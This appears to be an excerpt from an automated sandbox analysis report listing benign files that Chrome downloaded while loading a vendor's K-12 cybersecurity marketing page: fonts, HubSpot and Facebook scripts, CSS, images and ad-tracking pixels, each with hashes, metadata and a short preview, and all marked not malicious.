                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                                                                                                                                                          Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1243), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1243
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.132002213580923
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:BG/Bn68bKG20eOV0R2C1TT+RoRMd7usc1b0c33Z0nhLz4qaoVXKakhp:B0bY0ek08sii+hhLjVCH
                                                                                                                                                                                                                                                                                                                                                                          MD5:61CA66DE658CAB9587E4636894680D5D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:047E17B37C12CBB9DC8AD2B5CD0201A7C65E9F53
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8DA927B6B1240FFCA4323FBB2A12C8E5ABB541040965C2BC5B7D09A2EB963B02
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F178001D53C5E86D30E224FECF99B17ED1AA4AC704BF0B6BFC4E4B79F0184A4285C179EAB7602BDFA4F701BE9CD837AD4BE56DC560F7B174B8FC82082E9C6B58
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs/hsstatic/cos-i18n/static-1.53/bundles/project.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:"use strict";function hs_i18n_log(n){console.log("i18n_getmessage: "+n)}function hs_i18n_substituteStrings(n,e){var s=n.match(new RegExp("\\$[0-9]+","g"));if(null==s)return n;for(var r=0;r<s.length;r++){var l=s[r],t=parseInt(l.replace("$",""));t<=0||null==e||t>e.length?hs_i18n_log("no substitution string at index "+t+" found for string '"+n+"'"):n=n.replace(l,e[t-1])}return n}function hs_i18n_insertPlaceholders(n,e){var s=n.message,r=s.match(new RegExp("\\$\\w+\\$","g"));if(null==r)return s;for(var l=0;l<r.length;l++){var t=r[l],o=t.replace(new RegExp("\\$","g"),"").toLowerCase(),a=n.placeholders[o];null==a&&hs_i18n_log("no placeholder found for '"+o+"'");s=s.replace(t,a.content)}return(s=hs_i18n_substituteStrings(s,e)).replace(/\$\$/g,"$")}function hs_i18n_getMessage(n,e){if(null==n){hs_i18n_log("no messages found");return""}var s=arguments[2];if(null==s||0==s.length||null==s[0]){hs_i18n_log("no message name passed");return""}var r=s[0],l=e.split("-")[0],t=n[e]||n[l];if(null==t){hs_i1
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):250
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.079255168840599
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:YLzzWUJnwALXZfvuJdxLNwALXZ1TL+Y2wALXZfTzmKrofY:YLfWUwaItNwazTyY2waJmDw
                                                                                                                                                                                                                                                                                                                                                                          MD5:6399958774A02FF100F1C07B19B4EF1C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4D762F2573E752847B0E97FB094B31C96D6F11F6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:16528857EF3B22B0B99058388A2DB35E7A0A9CB2D03EABDEDFB81500B2F04530
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:64505BC2A0890282695E251A7B014D3C0A0F23C9350DD6F95729EF0CCE7C6A41902B54144110B1017B43FCF67E878A1842BD5A2ADD76486D759DD81F965E0F42
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://api.hubapi.com/hs-script-loader-public/v1/config/pixels-and-events/json?portalId=6834707
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"pixels":{"ADWORDS":[{"pixelId":"927141988","limitedDataUseEnabled":false}],"FACEBOOK":[{"pixelId":"283945248938426","limitedDataUseEnabled":true}],"LINKEDIN":[{"pixelId":"48411","limitedDataUseEnabled":false}]},"enhancedConversionEventSettings":{}}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text, with very long lines (2873)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9031
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.527216820529872
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:B1/6bZSDg3eksiGBpuMo5gXKl7LOjbke3CT2itXedSlFI:B1/6bZSDqeYGBbnal7LCbkkCT2oXedS8
                                                                                                                                                                                                                                                                                                                                                                          MD5:0A69A7A3530DE318072DE6182E31A0C6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9BF1165A0064FB85DD8F29DDC6C45AD5B9574EE9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BF1E2557855835794A8A1D9C1403AC53373CCEA3006325357E5CB384E93D7514
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9B24B0255A19285BF345BB199BAFF4DCCACBB55521FA0581E2AB196D5C28EC936749C6F9A21233261CBDE37033DA5C91D7F03A3A1FE4B25D8F325A7717760740
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/html/r20241009/r20190131/zrt_lookup_fy2021.html
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><script>.(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var l=this||self;var m,n;a:{for(var aa=["CLOSURE_FLAGS"],v=l,z=0;z<aa.length;z++)if(v=v[aa[z]],v==null){n=null;break a}n=v}var ba=n&&n[610401301];m=ba!=null?ba:!1;function ca(){var a=l.navigator;return a&&(a=a.userAgent)?a:""}var A;const da=l.navigator;A=da?da.userAgentData||null:null;function B(a){return m?A?A.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function C(a){return ca().indexOf(a)!=-1};function E(){return m?!!A&&A.brands.length>0:!1}function F(){return E()?B("Chromium"):(C("Chrome")||C("CriOS"))&&!(E()?0:C("Edge"))||C("Silk")};function ea(a,b){Array.prototype.forEach.call(a,b,void 0)};function G(a){G[" "](a);return a}G[" "]=function(){};var fa=ca().toLowerCase().indexOf("webkit")!=-1&&!C("Edge");!C("Android")||F();F();C("Safari")&&(F()||(E()?0:C("Coast"))||(E()?0:C("Opera"))||(E()?0:C("Edge"))||(E()?B("Microsoft Edge"):C("Edg/"))||E()&&B
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                                          MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://px.ads.linkedin.com/attribution_trigger?pid=48411&time=1728897184253&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5
                                                                                                                                                                                                                                                                                                                                                                          Preview:{}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2500x1667, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):176002
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998252764998983
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:Kl+VNx+Ep7UttMBVzyTJdHff0EdtXgbnv+F2/LAf8nfbxdp94cdSI6FVv:KUVNx+Ew6LuM8Xyv/Lq897acYvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:D41837B77C804F3E8C09974AF84462B2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B968EFB21FF8924A8ACF08053D1D4A77CB5563D0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C8322867EC82D816AB621B7D894C2681B712EB733FE68CD766B652793E882584
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EED376F7273128A954725EB9ED334000EEEFC843B7C4A0BA431D7D0528141332F0FBD8C968629101860B96ACDC3D8AC2BC7DCEC1646F700A399AF12BF51BDAFC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://2500081.fs1.hubspotusercontent-na1.net/hubfs/2500081/Inspire/bg1.jpg
                                                                                                                                                                                                                                                                                                                                                                          Preview:RIFFz...WEBPVP8 n...0....*....>I$.F"..*..Y9P..gn..^.f...O.3..l{..0_........?O.3.>_.....?..M.>;.*}...p.|.zG............=....I...................~|~...z8...W.......~..U............ky/...?..........p.........G...O.....F................W.....o..|/...=.?..z...............e....G.w....._...t.._.................../.~T.`.O..;./......r.....O...Hz.........../...?.|.............G..@...@.....o._..?U...A...7...?.?.?........w....|.......s...LLx..N.O].y.z.6...........2....._..%5 ..k..X....&.....[........<4......p..bmzP9..V...)...Yh..=~..Q..5b.`.l.....n.z.z..a..T.{....Z.%...0...:........=....o...}.......N.f2$..|11....._.J..;.....0.%.%.o....),./..~..Y7'D..;A.....a.^...9..A.H...1.q.....5$....q.XS+.3..hU?$...z...qfw..rh.I.uvA...0.>..2..m....w..c...uvN...=........\......R...^..j+?T..?.+1.....@....(.\...~....'q..]G....%g.kq.....F.@..1^cu.no.v1...,...$...$=.P.*G0...C.Y.....\....~..fe....}...X.r".......>...........X..'...........a..}..eJ.. F.........>..I8..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.612457348662773
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLV/VfsqPNVcSLQzRE9Ldu1S4:YWLV9soDLQmpdwS4
                                                                                                                                                                                                                                                                                                                                                                          MD5:69EE36929D2172DEA5C1763BAC240040
                                                                                                                                                                                                                                                                                                                                                                          SHA1:77EF82FC4B7757D445E8901E16D785AA44E3B1DF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:45DA241A91C843B268ADA7481CDECE1AA679F2720931EFFEA28D83E1398D66A9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FDA2E41AF332441315A0BC6352DD1B9350F92E13447CD1A58CBAA96748271C26780A653EA94F023808F572D1E329C855EF6A0E3B51558BF474ABA614AB26051A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/a2_dy5o8mn2d6oc_telemetry
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"version_hash":"8d515a58","url":"https://www.redditstatic.com/ads/8d515a58/pixel.js"}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://ml314.com/csync.ashx?fp=6fda36a68f67ef461be4d0b26fb6f2141b917bffc7362f122d9a6451b0460fdcf4cb09cee1a4f8eb&person_id=3647697138334302238&eid=50082
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):231864
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.458039173946496
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:nfLeYH8At6JK37OeR8NteGvQ+AMPpgArl0xYu5s713TW:nfLeYc+6JaH8N7QQGArHu5s713K
                                                                                                                                                                                                                                                                                                                                                                          MD5:40283CFC473AFBE1D4ABBA7E6C809885
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8A32CB88D9F537B02582DF17A5BB11C2087937F6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:48BA1993011DB4834882D81B2153753437607292F704A6543D4466C0F6D1372A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DABD9FD4CC3FB4FF3EBC2C3529E602E91939DDB1F42C2D7E70188DFC3262548922EA45C96691D567F2C777D393B5CE7162B5BD4C2054B33A03856BBEA1C1A0E3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                          MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=7d931d72-b6cd-40d8-9aaa-91033ac03d95&ttd_puid=e3913225-94b4-4b08-9fd3-4285fd980084%2C%2C
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=105&external_user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&expiration=1760433211
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):495233
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.818838111426701
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:pTppKtJ61ubHWLXC8bCH2nqHAj/pOe4e8pU+xrueGd6BUeyiCb6D8x:BuCeH2nqHADpp4xO+IeGd6BUa+x
                                                                                                                                                                                                                                                                                                                                                                          MD5:53FA063FB1734CE6BB187C96E7665972
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6C82DE36CB5AC4DA7DBCC104CF4F33D067D07C46
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0200A7698AFAE38E9385F59706F2C5966FCD943AEC1B0D47597FB65F319FA2B0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6986E2E61C4264FE4C156ABFD1F6B665F53DCC6155EFE5F0D595D0E788116119E32C0A09D82558F4907729FDCDB8D8A31DD3CD3576B6460B13CBE634670AE5F9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var a=t[r]={i:r,l:!1,exports:{}};e[r].call(a.exports,a,a.exports,n);a.l=!0;return a.exports}n.m=e;n.c=t;n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})};n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};n.t=function(e,t){1&t&&(e=n(e));if(8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);n.r(r);Object.defineProperty(r,"default",{enumerable:!0,value:e});if(2&t&&"string"!=typeof e)for(var a in e)n.d(r,a,function(t){return e[t]}.bind(null,a));return r};n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};n.d(t,"a",t);return t};n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)};n.p="//static.hsappstatic.net/forms-embed/static-1.6227/";n(n.s="bxrb")}({"+1EL":function(e,t,n){"use stri
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4562), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4562
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.278277697264248
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:npU+cd/yfTpU+cwBj4pU+cqWDgy09/lh/:u/yf3BHDgyen
                                                                                                                                                                                                                                                                                                                                                                          MD5:FDA5882B24CA5A84D04D090722DC713B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F536C946C4AF69CC3D902F236990FEF5D96B11FD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:356BB4BF2245A68EE5DE5732B5574260DD2016A2C3987E17AD97FB2586A883D1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DFFF102EC75EA8EA4BA831018D8FCD49D2271722BABDB84E0BEEF2ACA48A36DDB07E9D0D52428AC8D1E35058FAD1AA5AE33E237CD1E0B1A3CD2EE684165EEE79
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://7052064.fs1.hubspotusercontent-na1.net/hub/7052064/hub_generated/template_assets/1728333327502/hubspot/hubspot_default/shared/responsive/layout.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:.row-fluid{width:100%;*zoom:1}.row-fluid:after,.row-fluid:before{content:"";display:table}.row-fluid:after{clear:both}.row-fluid [class*=span]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box;display:block;float:left;margin-left:2.127659574%;*margin-left:2.0744680846382977%;min-height:28px;width:100%}.row-fluid [class*=span]:first-child{margin-left:0}.row-fluid .span12{width:99.99999998999999%;*width:99.94680850063828%}.row-fluid .span11{width:91.489361693%;*width:91.4361702036383%}.row-fluid .span10{width:82.97872339599999%;*width:82.92553190663828%}.row-fluid .span9{width:74.468085099%;*width:74.4148936096383%}.row-fluid .span8{width:65.95744680199999%;*width:65.90425531263828%}.row-fluid .span7{width:57.446808505%;*width:57.3936170156383%}.row-fluid .span6{width:48.93617020799999%;*width:48.88297871863829%}.row-fluid .span5{width:40.425531911%;*width:40.3723404216383%}.row-fluid .span4{width:31.914893614%;*width:31.861702124638
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 300 x 250, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):14864
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9557724476880765
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:0y2gQr+e6SLy11r/FLM3ik7DmLBc3xrJZ3CWci9G:HY6yLyTr/pM3d7DmLW3xdZO
                                                                                                                                                                                                                                                                                                                                                                          MD5:715C6EE13F857D44527273C8468B1164
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A77FD8400CABCA2A92D0B34E68C6E6A6D0EFA0E9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0F7E0CFB6D530C55022148DDCDB56488B7555C33BA634AACE1248A64AEEFC917
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:220F37F17F5FF8A95ED15F36227922B15F7592321B1899FBB84DC7DC81CF4C458793E07FCB53DDA0CF79A1F5F95287044E0F54444441ABABA42D91389E38F549
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
